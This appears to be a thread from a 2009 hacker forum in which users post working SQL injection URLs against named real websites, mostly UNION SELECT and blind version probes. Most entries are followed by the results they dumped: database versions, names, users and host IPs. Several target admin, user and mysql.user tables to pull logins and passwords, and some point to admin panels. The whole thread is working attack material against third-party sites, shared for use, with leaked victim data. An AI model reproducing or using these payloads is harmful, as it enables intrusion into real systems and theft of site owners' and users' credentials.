http://www.boardgameextras.co.uk/item.php?id=270&name=100+Mini+Euro+Card+Sleeves+%2845+MM+X+68+MM%2 9&cat=48&sub_cat=0+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--
4.0.26-standard-log:VerseAD_bgshop:VerseAD_website@80.253.99.23
====================================
[PR 0]
http://www.psychologi.biz/detail.php?id=99999999+union+select+concat_ws(0x3a ,version(),database(),user()),2,3,4,5,6,7,8
5.0.77:intertime_psyc:intertime_psyc@localhost
====================================
[PR 0]
http://biz.bdnews24.com/details.php?id=-89641+union+select+concat_ws(0x3a,version(),databa se(),user()),2,3,4,5,6,7&cid=4
5.0.45-log:aplustemp:aplus@localhost
HAXTA4OK
24.07.2009, 08:52
http://www.inrp.fr/ardist2005/resume.php?Rtr=Cr137&Id=1+and+substring(version(),1,1)=5--
http://www.mrech.ru/index.phtml?f=doc5&id_docs=-258/**/UNION/**/SELECT/**/1,password,name,4,5,6,7,8,9+from+admins--+
HAXTA4OK
24.07.2009, 09:29
TIC: 550
PR: 4
http://www.palmq.ru/sections.php?op=viewarticle&artid=-89+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10--
palmqru@localhost:db_palmqru:5.0.51a-community
http://synapse-design.de/amanda-tapping/news.php?id=-315+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7,8--
tapping:5.0.45:login@server12.host2day.com
http://www.heavyworlds.com/news.php?id=-4813+union+select+1,2,3,concat_ws(0x3a,database(), version(),user()),5--
Sql156633_1:5.0.68-log:Sql156633@62.149.141.54
http://www.hardsignal.net/news.php?read=1&id=-9+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
djpauzec_hardsignal:5.0.75-community-log:djpauzec_djpauze@localhost
http://www.biomedis.ru/news.php?newsId=-2+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6--
admin_biomedis:5.0.37-standard:admin_ulisss@localhost
http://www.underoath777.com/news.php?id=-145+union+select+1,2,3,4,concat_ws(0x3a,database() ,version(),user()),6--
underoath:5.0.67-log:underoath@208.113.245.251
Calcutta
24.07.2009, 21:10
http://podcastchicago.tv/category.php?id=2611+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18--
Branch 5.
HAXTA4OK
24.07.2009, 22:19
PR: 4
http://www.animal-law.biz/talk.php?type=gg&view=full&id=1+union+select+1,concat_ws(0x3a,database(),user (),version()),3,4,5,6
anima4:anima4@localhost:4.0.27-log
####################################
http://www.opisy-gg.info.pl/categories.php?id=1+and+substring(version(),1,1)=5--
####################################
PR: 3
http://www.gicma.gg/news_view.php?id=1+union+select+concat_ws(0x3a,ver sion(),user(),database()),2,3--
5.0.82-community:web35-gicma@79.170.40.35:web35-gicma
####################################
PR: 4
http://www.ekabaret.pl/gg.php?id=1+and+substring(version(),1,1)=5
mr.gr33n
24.07.2009, 23:43
http://www.mypsion.ru/news.php?id=-7+union+select+1,UNHEX(hex(concat(0x3c63656e746572 3e3c68313e416e7469636861743c2f68313e3c2f63656e7465 723e3c62722f3e,user(),0x3c62722f3e,version(),0x3c6 2722f3e,database()))),3,4,5,6,7,8--
PR: 4 TIC: 300
http://www.colortv.ru/news.php?id=-7+union+select+1,2,3,concat(0x3c63656e7465723e3c68 313e416e7469636861743c2f68313e3c2f63656e7465723e3c 62722f3e,version(),0x3a,user(),0x3a,database()),5, 6,7--
PR: 4 TIC: 40
some online game
http://questgames.info/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,use r_password)KHG+from+e107_user+where+user_id=1--
http://www.sme.com.ph/sme-resources-tools/resources-tools.php?page=articles&id=-23+union+select+concat_ws(0x3a,version(),database( ),user()),2,3,4,5,6--
4.1.22-standard:smecom_db:smecom_user@localhost
http://www.robottrading.com.au/tools.php?id=-23+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7--
4.0.27-Max-log:db_robo_data:db_robo_data@piro.server101.com
http://katalog.motorky.com/moto.php?id=-23+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--
5.0.30-Debian_3:motorky@localhost:motorky 3 Table moto_users
ph1l1ster
25.07.2009, 02:10
http://www.wxdu.duke.edu/plmanager/world/djplaylists.php?id=-54+union+select+concat(login,0x3a,password),2,3,4, 5,6,7,8,9,10,11+from+logins--
http://www.wxdu.duke.edu/plmanager/
pelligrim
25.07.2009, 15:11
http://www.evildread.com/asian-reviews/asian_review.php?id=9999+union+select+1,2,3,4,5,6, 7,concat_ws(0x3a,version(),database(),user()),9,10 ,11,12,13,14,15,16,17,18,19,20
5.0.32-Debian_7etch10-log:evildread_com:evildread_com@srv39.one.com
http://www.sendandserve.co.uk/publications_detail.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4--
5.0.82-community:web20_serve:web20_serve@localhost
http://www.chocolateguns.com/discography.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21--
5.0.68-log:Sql121050_1:Sql121050@62.149.141.69
hatamahata
26.07.2009, 03:09
http://www.dfhklab.com.hk/eng/main.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8--
5.0.67-community:dfhklab_db:dfhklab_db@localhost
http://www.igp.pt/main.php?Id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9--
4.0.14-STANDARD:WOF:JAFONSO@OCTOPUS
mr.gr33n
26.07.2009, 04:41
P.S. everyone should take a look at what the password is here xDD
http://www.consultunion.ru/news.php?id=-7+union+select+1,2,3,4,concat(login,0x3a,pass),6,7 +from+accounts--
http://www.magry.ru/news.php?id=-7+union+select+concat(login,0x3a,pass)+from+users--
http://www.taktika-irk.ru/news.php?id=-7+union+select+1,concat(Name,0x3a,Pass),3,4+from+u ser--
http://www.pavsekakii.ru/news.php?page=1&id=-7+union+select+1,concat(version(),0x3a,user(),0x3a ,database())--
fed up with all these horoscopes )))
http://banzay-kazan.ru/news.php?id=-7+union+select+1,concat(login,0x3a,psw),3,4,5,6,7+ from+login--
http://sib-usadba.ru/news.php?id=-7+union+select+1,2,3,concat(username,0x3a,password ),5,6+from+jos_users--
http://autosklad35.ru/news/news.php?id=-7+union+select+1,2,3,concat(login,0x3a,pass),5+fro m+shops--
http://ocenshik.mostpp.ru/news.php?id=-7+union+select+1,2,3,4,concat(user,0x3a,password), 6,7,8+from+mysql.user--
root@zvm27.host.ru:4.0.27
http://fibroblok.ru/cms-news.php?mode=view_news&id=-7+union+select+1,concat_ws(0x3a,version(),user()), 3,4,5,6--
http://www.pilorama.ru/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5,6,7--
http://www.terta-avangard.ru/news.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8--
http://reklamagoroda.ru/news.php?id=-7+union+select+1,concat(username,0x3a,password),3, 4,5,6,7+from+rbg_users--
http://reklamagoroda.ru/admin/
http://www.sibezrcs.ru/articles.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8,9,0,1--
http://www.semsk.kz/newscat.php?id=-7+union+select+concat_ws(0x3a,database(),version() ,user())--
semsk_main:5.0.45:semsk_main@localhost
http://www.designershoes.name/gucci-sneakers-trainers.php?id=-357+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5--
shoes:4.0.27-log:designer@localhost
[PR: 5]
http://www.iso.ru/cgi-bin/main/reports.cgi?what=rep&id=35+and+substring(version(),1,1)=3
User: root@localhost
Version: 3.23.41
DB: iso_new
dr.Pilulkin
26.07.2009, 17:08
http://www.wrightbalance.com/tips/index.php?article=-88+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7--
mindun2_mindun2@localhost:5.0.67-community:mindun2_MUP
mindun2_MUP:User:Password
mindun2_MUP:phplist_admin:password
mindun2_MUP:phplist_user_user:password
=========
http://www.stewartscannock.co.uk/print.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),version(),database()),11,12,13,14,15,16,17,18 ,19--
stewarts@localhost:4.0.27-standard:stewartscannock_co_uk
=========
http://www.flevolandsebeamerverhuur.nl/print.php?op=printapage&pageid=-7+union+select+1,2,database(),4,5--
flbeve@localhost:5.0.51a-12-log:flbeve
flbeve:net_aid:pwd
=======
http://www.nregion.com/print.php?i=-5518+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9--
nregion@91.102.154.144:5.1.30:wwwnregioncom
=======
http://www.segodnia.ru/print.php?s=0&n=-7526+union+select+concat_ws(0x3a,user(),version(), database()),2,3,4,5--
sega@localhost:5.1.22-rc:sedoy
=======
http://www.apn-nn.ru/print.php?typ=pub&id=-777+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5--
apnnn@localhost:5.0.70-log:apnnn
apn_nn:usr:pass
kislovsky:usr:pass
http://www.1989history.eu/view_project.php?id=-70+union+select+1,2,3,4,5,6,7--
Database Version: 4.1.22-standard
Database name: eu1989_eustory
User name: eu1989_eu1989@localhost
http://www.smdailyjournal.com/article_preview.php?id=-66988+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4--
Database Version: 4.0.25
Database name: smdaily2
User name: smdaily2@localhost
+++AndreyDevil+++
27.07.2009, 00:44
http://tjnm.tsnm.org/tjnm/content.php?id=LTEnIHVuaW9uIHNlbGVjdCAxLDIsdmVyc2l vbigpLDQsdXNlcigpLDYsNyw4LS0g
5.0.67-community
tsnm_user@localhost
tsnm_dergi